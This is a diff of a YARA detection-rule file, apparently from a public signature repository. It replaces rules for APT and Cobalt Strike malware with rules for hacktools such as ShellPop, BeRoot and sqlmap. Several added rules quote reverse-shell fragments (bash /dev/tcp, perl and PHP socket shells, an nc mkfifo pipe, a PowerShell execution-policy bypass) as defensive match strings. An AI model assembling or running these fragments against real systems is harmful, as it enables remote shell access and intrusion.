-		author = "Florian Roth (Nextron Systems)"
-		id = "8ec52cb7-41a4-50a9-9cb1-23bee354680f"
-		date = "2018-06-23"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-tick-group-weaponized-secure-usb-drives-target-air-gapped-critical-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tick_weaponized_usb.yar#L40-L58"
+		description = "Detects Shellpop Perl script"
+		author = "Tobias Michalski"
+		id = "d597d213-a70b-5412-adde-791b4d498848"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4310-L4323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b4c798aa0c71f44f271e710d791c97adcbf9bd28ec87dd1d8d589029e58d1cfb"
+		logic_hash = "8f3c5920acdc080b437c15b93e192a00a5037be0323cc04473e238033b7d53ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f817c9826089b49d251b8a09a0e9bf9b4b468c6e2586af60e50afe48602f0bec"
+		hash1 = "32c3e287969398a070adaad9b819ee9228174c9cb318d230331d33cda51314eb"
 
 	strings:
-		$s1 = "cmd /c hostname >>" fullword ascii
-		$s2 = "Mstray.exe" fullword ascii
-		$s3 = "msupdata.exe" fullword ascii
-		$s5 = "Windows\\CurrentVersion\\run" fullword ascii
-		$s6 = "Content-Type: */*" fullword ascii
-		$s11 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" fullword ascii
+		$ = "perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);" ascii
+		$ = ";STDIN->fdopen(\\$c,r);$~->fdopen(\\$c,w);s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 3 of them
+		filesize < 2KB and 1 of them
 }
-rule SIGNATURE_BASE_Dexter_Malware
+rule SIGNATURE_BASE_HKTL_Shellpop_Python : FILE
 {
 	meta:
-		description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8be328ec-ba29-50ba-8d35-e2c4dfcae45e"
-		date = "2015-02-10"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/oBvy8b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_dexter_trojan.yar#L1-L17"
+		description = "Detects malicious python shell"
+		author = "Tobias Michalski"
+		id = "62fe0ae9-422e-5021-8a67-e88ff4bd2cf3"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4325-L4337"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b05bccce63c1f7e8d6d3f654b611f33da5fc1dbcbd28ff28f817d00bf961e64"
-		score = 70
-		quality = 60
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "e4c35bb739eeabf0de558ee1b97225ed4eb3198e7e6db1817348115b848146c7"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		hash1 = "aee1c9e45a1edb5e462522e266256f68313e2ff5956a55f0a84f33bc6baa980b"
 
 	strings:
-		$s0 = "Java Security Plugin" fullword wide
-		$s1 = "%s\\%s\\%s.exe" fullword wide
-		$s2 = "Sun Java Security Plugin" fullword wide
-		$s3 = "\\Internet Explorer\\iexplore.exe" wide
+		$ = "os.putenv('HISTFILE', '/dev/null');" ascii
 
 	condition:
-		all of them
+		filesize < 2KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_Powersploit
+rule SIGNATURE_BASE_HKTL_Shellpop_PHP_TCP : FILE
 {
 	meta:
-		description = "Detects default strings used by PowerSploit to establish persistence"
-		author = "Markus Neis"
-		id = "8cb0753c-c5bb-56fc-b492-4e785f4bdaf4"
-		date = "2018-06-23"
-		modified = "2023-12-05"
-		reference = "https://www.hybrid-analysis.com/sample/16937e76db6d88ed0420ee87317424af2d4e19117fe12d1364fee35aa2fadb75?environmentId=100"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powersploit_dropper.yar#L1-L15"
+		description = "Detects malicious PHP shell"
+		author = "Tobias Michalski"
+		id = "3bafc225-62e5-5183-84aa-9c3406b6c444"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4339-L4352"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "00bc389147926f3b474a7072381bb8b9cddad3ff581a5d2182006a674e0c0163"
+		logic_hash = "8ffab71130b4fa6efbe9864f97c33fed9359f79d51b84e8f952c911f24d1496c"
 		score = 75
-		quality = 81
-		tags = ""
-		hash1 = "16937e76db6d88ed0420ee87317424af2d4e19117fe12d1364fee35aa2fadb75"
+		quality = 85
+		tags = "FILE"
+		hash1 = "0412e1ab9c672abecb3979a401f67d35a4a830c65f34bdee3f87e87d060f0290"
 
 	strings:
-		$ps = "function" nocase ascii wide
-		$s1 = "/Create /RU system /SC ONLOGON" ascii wide
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide
+		$x1 = "php -r \"\\$sock=fsockopen" ascii
+		$x2 = ";exec('/bin/sh -i <&3 >&3 2>&3');\"" ascii
 
 	condition:
-		all of them
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_MAL_EXPL_Perfctl_Oct24 : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Powershell_TCP : FILE
 {
 	meta:
-		description = "Detects exploits used in relation with Perfctl malware campaigns"
-		author = "Florian Roth"
-		id = "1f525eaf-445c-592e-bfa4-e9846390dd1d"
-		date = "2024-10-09"
-		modified = "2024-12-12"
-		reference = "https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_perfctl_oct24.yar#L2-L21"
+		description = "Detects malicious powershell"
+		author = "Tobias Michalski"
+		id = "4f3a92db-f686-559a-9588-fb79f423c51f"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4354-L4367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "44d4683efc66b3c6c2d32be6b83a2bbc1db39c9a020365dddd27c20667bc6a66"
-		score = 80
+		logic_hash = "8eb484ba87fa2e10af3c59445ccb4be73db2f5ae67c59118a2e188ba02fdc957"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13"
+		hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
 
 	strings:
-		$s1 = "Exploit failed. Target is most likely patched." ascii fullword
-		$s2 = "SHELL=pkexec" ascii fullword
-		$s3 = "/dump_" ascii fullword
-		$s4 = ".EYE$" ascii
+		$ = "Something went wrong with execution of command on the target" ascii
+		$ = ";[byte[]]$bytes = 0..65535|%{0};$sendbytes =" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 30000KB and 2 of them or all of them
+		filesize < 3KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_LNX_Perfctl_Oct24 : FILE
+rule SIGNATURE_BASE_SUSP_Powershell_Shellcommand_May18_1 : FILE
 {
 	meta:
-		description = "Detects Perfctl malware samples"
-		author = "Florian Roth"
-		id = "391513ae-3348-5297-a22a-6f06e50f06d2"
-		date = "2024-10-09"
-		modified = "2024-12-12"
-		reference = "https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_perfctl_oct24.yar#L23-L42"
+		description = "Detects a supcicious powershell commandline"
+		author = "Tobias Michalski"
+		id = "efa81fd0-b764-5a1a-98a5-fc3135be220b"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4369-L4382"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d47df34240f59124542acc41484e8935327490c04c4e15a558b2ffc6f9c52ea8"
-		score = 75
+		logic_hash = "bc858d74b8aad09ff539489e961e1a51ba5fe17d3424615ffe5029587ddb9478"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		hash1 = "a6d3c6b6359ae660d855f978057aab1115b418ed277bb9047cd488f9c7850747"
-		hash2 = "ca3f246d635bfa560f6c839111be554a14735513e90b3e6784bedfe1930bdfd6"
+		hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
 
 	strings:
-		$op1 = { 83 45 f8 01 8b 45 f8 48 3b 45 98 0f 82 1b ff ff ff 90 c9 c3 55 }
-		$op2 = { 48 8b 55 a0 48 01 ca 0f b6 0a 48 8b 55 a8 89 c0 88 4c 02 18 8b 45 fc 83 e0 3f }
-		$op3 = { 88 4c 10 58 83 45 f8 01 83 7d f8 03 0f 86 68 ff ff ff 90 c9 c3 55 }
-		$op4 = { 48 83 ec 68 48 89 7d a8 48 89 75 a0 48 89 55 98 48 8b 45 a8 48 8b 00 83 e0 3f 89 45 fc }
+		$x1 = "powershell -nop -ep bypass -Command" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 300KB and 2 of them
+		filesize < 3KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_Cobaltstrike_Beacon_Indicator : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Telnet_TCP : FILE
 {
 	meta:
-		description = "Detects CobaltStrike beacons"
-		author = "JPCERT"
-		id = "8508c7a0-0131-59b1-b537-a6d1c6cb2b35"
-		date = "2018-11-09"
-		modified = "2023-12-05"
-		reference = "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L40-L52"
+		description = "Detects malicious telnet shell"
+		author = "Tobias Michalski"
+		id = "dbd5cc65-c6f1-54f3-813f-7a7f9bcca184"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4384-L4397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f429a7a8c8bbea22eba3bbf81e391dab8e957583283a995d1d60d42f17c20e7"
+		logic_hash = "e900fb8c0f1fa61f242b97ac542cb1bfd691dd50523e0023e97e3b21617053d7"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
+		hash1 = "cf5232bae0364606361adafab32f19cf56764a9d3aef94890dda9f7fcd684a0e"
 
 	strings:
-		$v1 = { 73 70 72 6E 67 00 }
-		$v2 = { 69 69 69 69 69 69 69 69 }
+		$x1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
+		$x2 = "0</tmp/f|/bin/bash 1>/tmp/f" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		filesize < 3KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_Strings
+rule SIGNATURE_BASE_SUSP_Shellpop_Bash
 {
 	meta:
-		description = "Identifies strings used in Cobalt Strike Beacon DLL"
-		author = "Elastic"
-		id = "af558aa2-a3dc-5a7a-bc74-42bb2246091c"
-		date = "2021-03-16"
-		modified = "2023-12-05"
-		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L54-L67"
+		description = "Detects susupicious bash command"
+		author = "Tobias Michalski"
+		id = "771b7d01-272a-5986-af07-7417b84c52ed"
+		date = "2018-05-18"
+		modified = "2025-04-11"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4399-L4416"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4349a7ad94df2269217b55c2aef9628c4eef078566c276936accdd4f996ba2cf"
-		score = 75
+		logic_hash = "a557822eaaad84897acc32935f7545deb17ea3b8c6e34acd0ac5ef9fad08cb1e"
+		score = 70
 		quality = 85
 		tags = ""
+		hash1 = "36fad575a8bc459d0c2e3ad626e97d5cf4f5f8bedc56b3cc27dd2f7d88ed889b"
 
 	strings:
-		$s1 = "%02d/%02d/%02d %02d:%02d:%02d"
-		$s2 = "Started service %s on %s"
-		$s3 = "%s as %s\\%s: %d"
+		$x1 = "bash -i >& /dev/tcp/" ascii
+		$x2 = "bash -i >& /dev/tcp/" ascii base64
+		$fp1 = "bash -i >& /dev/tcp/IP/PORT" ascii
 
 	condition:
-		2 of them
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_XOR_Strings
+rule SIGNATURE_BASE_HKTL_Shellpop_Netcat : FILE
 {
 	meta:
-		description = "Identifies XOR'd strings used in Cobalt Strike Beacon DLL"
-		author = "Elastic"
-		id = "359160a8-cf1c-58a8-bf7f-c09a8d661308"
-		date = "2021-03-16"
-		modified = "2023-12-05"
-		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L69-L88"
+		description = "Detects suspcious netcat shellpop"
+		author = "Tobias Michalski"
+		id = "cd55e912-b57b-5fce-98eb-5a0cd27a6e4d"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4418-L4433"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b5009c29055784ce6371100417b862f723d7e3c1b4081c563fcd8770db48051f"
+		logic_hash = "2c61da27d4bc455a9f2555fcc1c5cce7cead226a5900eeed1aaf622616051b79"
 		score = 75
 		quality = 85
-		tags = ""
-		xor_s1 = "%02d/%02d/%02d %02d:%02d:%02d"
-		xor_s2 = "Started service %s on %s"
-		xor_s3 = "%s as %s\\%s: %d"
+		tags = "FILE"
+		hash1 = "98e3324f4c096bb1e5533114249a9e5c43c7913afa3070488b16d5b209e015ee"
 
 	strings:
-		$s1 = "%02d/%02d/%02d %02d:%02d:%02d" xor(0x01-0xff)
-		$s2 = "Started service %s on %s" xor(0x01-0xff)
-		$s3 = "%s as %s\\%s: %d" xor(0x01-0xff)
-		$fp1 = "MalwareRemovalTool"
+		$s1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
+		$s2 = "fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc" ascii
+		$s4 = "mknod /tmp/f p && nc" ascii
+		$s5 = "</tmp/f|/bin/bash 1>/tmp/f" ascii
 
 	condition:
-		2 of ( $s* ) and not 1 of ( $fp* )
+		filesize < 2KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_4_2_Decrypt
+rule SIGNATURE_BASE_HKTL_Berootexe : FILE
 {
 	meta:
-		description = "Identifies deobfuscation routine used in Cobalt Strike Beacon DLL version 4.2"
-		author = "Elastic"
-		id = "63b71eef-0af5-5765-b957-ccdc9dde053b"
-		date = "2021-03-16"
-		modified = "2023-12-05"
-		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L90-L102"
+		description = "Detects beRoot.exe which checks common Windows missconfigurations"
+		author = "yarGen Rule Generator"
+		id = "b91c2e0b-2e47-5339-bf48-eaa8329ea63b"
+		date = "2018-07-25"
+		modified = "2025-04-14"
+		reference = "https://github.com/AlessandroZ/BeRoot/tree/master/Windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4436-L4452"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8685b1626c8d263f49ccf129dcd4fe1b42482fcdb37c2e109cedcecaed8c2407"
+		logic_hash = "8e10fddd3b3eb5e5200d9ed0bcb23961d196d9e1de03ebf03a96374ee02a9097"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "865b3b8ec9d03d3475286c3030958d90fc72b21b0dca38e5bf8e236602136dd7"
 
 	strings:
-		$a_x64 = {4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03}
-		$a_x86 = {8B 46 04 8B 08 8B 50 04 83 C0 08 89 55 08 89 45 0C 85 C9 75 04 85 D2 74 23 3B CA 73 E6 8B 06 8D 3C 08 33 D2}
+		$s1 = "checks.webclient.secretsdump(" ascii
+		$s2 = "beroot.modules" fullword ascii
+		$s3 = "beRoot.exe.manifest" fullword ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 18000KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_Win_Cobaltstrike : COMMODITY
+rule SIGNATURE_BASE_HKTL_Berootexe_Output : FILE
 {
 	meta:
-		description = "The CobaltStrike malware family."
-		author = "threatintel@volexity.com"
-		id = "113ba304-261f-5c59-bc56-57515c239b6d"
-		date = "2021-05-25"
-		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L104-L122"
+		description = "Detects the output of beRoot.exe"
+		author = "Tobias Michalski"
+		id = "dfd11915-443f-5ce9-b94a-bdcb0e62104e"
+		date = "2018-07-25"
+		modified = "2025-04-14"
+		reference = "https://github.com/AlessandroZ/BeRoot/tree/master/Windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4454-L4468"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b041efb8ba2a88a3d172f480efa098d72eef13e42af6aa5fb838e6ccab500a7c"
-		logic_hash = "1e8a68050ff25f77e903af2e0a85579be1af77c64684e42e8f357eee4ae59377"
+		logic_hash = "7886535d071092df76507f0dd431409e85c368d404f49e7f118278f6565618e6"
 		score = 75
 		quality = 85
-		tags = "COMMODITY"
+		tags = "FILE"
 
 	strings:
-		$s1 = "%s (admin)" fullword
-		$s2 = {48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 2D 73 74 72 65 61 6D 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 0D 0A 0D 0A 00}
-		$s3 = "%02d/%02d/%02d %02d:%02d:%02d" fullword
-		$s4 = "%s as %s\\%s: %d" fullword
-		$s5 = "%s&%s=%s" fullword
-		$s6 = "rijndael" fullword
-		$s7 = "(null)"
+		$s1 = "permissions: {'change_config'" fullword wide
+		$s2 = "Full path: C:\\Windows\\system32\\msiexec.exe /V" fullword wide
+		$s3 = "Full path: C:\\Windows\\system32\\svchost.exe -k DevicesFlow" fullword wide
+		$s4 = "! BANG BANG !" fullword wide
 
 	condition:
-		all of them
+		filesize < 400KB and 3 of them
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_1 : FILE
+rule SIGNATURE_BASE_HKTL_Embeddedpdf : FILE
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "21e858b1-2cfa-5757-96f0-7c44a5da6898"
-		date = "2016-12-14"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L10-L27"
+		description = "Detects Embedded PDFs which can start malicious content"
+		author = "Tobias Michalski"
+		id = "d4e2d878-fb75-54c5-9879-fe94102911d1"
+		date = "2018-07-25"
+		modified = "2025-04-14"
+		reference = "https://twitter.com/infosecn1nja/status/1021399595899731968?s=12"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4470-L4487"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "143e52eedc5c3be9bbf0f916b232de26e4ed5c7e81e3f77cae70e6af84d31de1"
+		logic_hash = "041580406e2a7c644d713d8fbf7fccb81664ff536e62df26b3c0f331409fb993"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e12031da58c0b08e8b610c3786ca2b66fcfea8ddc9ac558d08a29fd27e95a3e7"
 
 	strings:
-		$s1 = "c:\\Windows\\system32\\syswindxr32.dll" fullword wide
-		$s2 = "c:\\windows\\temp\\TrueCrypt-Setup-7.1a-tamindir.exe" fullword wide
-		$s3 = "%s\\ssleay32.dll" fullword wide
-		$s4 = "%s\\libeay32.dll" fullword wide
-		$s5 = "%s\\fprot32.exe" fullword wide
+		$x1 = "/Type /Action\n /S /JavaScript\n /JS (this.exportDataObject({" fullword ascii
+		$s1 = "(This PDF document embeds file" fullword ascii
+		$s2 = "/Names << /EmbeddedFiles << /Names" fullword ascii
+		$s3 = "/Type /EmbeddedFile" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10000KB and 3 of them ) or ( all of them )
+		uint16( 0 ) == 0x5025 and 2 of ( $s* ) and $x1
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_2 : FILE
+rule SIGNATURE_BASE_HTKL_Blackbone_Driverinjector : FILE
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
+		description = "Detects BlackBone Driver injector"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5858541b-c394-5be8-9db3-fcff66f635de"
-		date = "2016-12-14"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L29-L45"
+		id = "0d992a6c-c57a-5895-af0d-9c167d922601"
+		date = "2018-09-11"
+		modified = "2025-04-14"
+		reference = "https://github.com/DarthTon/Blackbone"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4489-L4515"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d97ee2698b6a09da7f8c6850583ec7493cc288368b98b20790dd8305521f894"
-		score = 75
+		logic_hash = "d6a5f02a465ea46892e1de54a3482aace387ab0d2cdb949e263ce63f4f9edbb7"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1aef507c385a234e8b10db12852ad1bd66a04730451547b2dcb26f7fae16e01f"
-
-	strings:
-		$s1 = "winasys32.exe" fullword ascii
-		$s2 = "alg32.exe" fullword ascii
-		$s3 = "wmsrv32.exe" fullword ascii
-		$s4 = "vmnat32.exe" fullword ascii
+		hash1 = "8062a4284c719412270614458150cb4abbdf77b2fc35f770ce9c45d10ccb1f4d"
+		hash2 = "2d2fc27200c22442ac03e2f454b6e1f90f2bbc17017f05b09f7824fac6beb14b"
+		hash3 = "e45da157483232d9c9c72f44b13fca2a0d268393044db00104cc1afe184ca8d1"
+
+	strings:
+		$s1 = "=INITtH=PAGEtA" fullword ascii
+		$s2 = "BBInjectDll" fullword ascii
+		$s3 = "LdrLoadDll" fullword ascii
+		$s4 = "\\??\\pipe\\%ls" fullword wide
+		$s5 = "Failed to retrieve Kernel base address. Aborting" fullword ascii
+		$x2 = "BlackBone: %s: APC injection failed with status 0x%X" fullword ascii
+		$x3 = "BlackBone: PDE_BASE/PTE_BASE not found " fullword ascii
+		$x4 = "%s: Invalid injection type specified - %d" fullword ascii
+		$x6 = "Trying to map C:\\windows\\system32\\cmd.exe into current process" fullword wide
+		$x7 = "\\BlackBoneDrv\\bin\\" ascii
+		$x8 = "DosDevices\\BlackBone" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and ( 3 of them or 1 of ( $x* ) )
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_3 : FILE
+rule SIGNATURE_BASE_HKTL_Sqlmap : FILE
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
+		description = "Detects sqlmap hacktool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bff79813-0d72-50d9-9676-794801edc34b"
-		date = "2016-12-14"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L47-L63"
+		id = "da2029dd-c4ce-557f-a409-c468fa3deef3"
+		date = "2018-10-09"
+		modified = "2025-04-14"
+		reference = "https://github.com/sqlmapproject/sqlmap"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4517-L4530"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "47595e07b59744f520cd9025bcec267384329b7687fd25842f5f7a8f4b360674"
+		logic_hash = "9aa13bc2db40f5ab3debd617c84b1e11805d137bc55e9088bc9a0c23e185dfce"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f98ac11c78ad1b4c5c5c10a88857baf7af43acb9162e8077709db9d563bcf02"
+		hash1 = "9444478b03caf7af853a64696dd70083bfe67f76aa08a16a151c00aadb540fa8"
 
 	strings:
-		$s1 = "%s SslHandshakeDone(%d) %d. Secure connection with %s, cipher %s, %d secret bits (%d total), session reused=%s" fullword ascii
-		$s2 = "mvhost32.dll" fullword ascii
-		$s3 = "sdwin32.dll" fullword ascii
-		$s4 = "ofx64.dll" fullword ascii
+		$x1 = "if cmdLineOptions.get(\"sqlmapShell\"):" fullword ascii
+		$x2 = "if conf.get(\"dumper\"):" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them ) or ( all of them )
+		filesize < 50KB and 1 of them
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_4 : FILE
+rule SIGNATURE_BASE_HKTL_Sqlmap_Backdoor : FILE
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
+		description = "Detects SqlMap backdoors"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4e926b1c-bf10-5337-8c3a-964008a37d8b"
-		date = "2016-12-14"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L65-L85"
+		id = "bf09caac-cf15-5936-b5b4-df4f28788961"
+		date = "2018-10-09"
+		modified = "2025-04-14"
+		reference = "https://github.com/sqlmapproject/sqlmap"
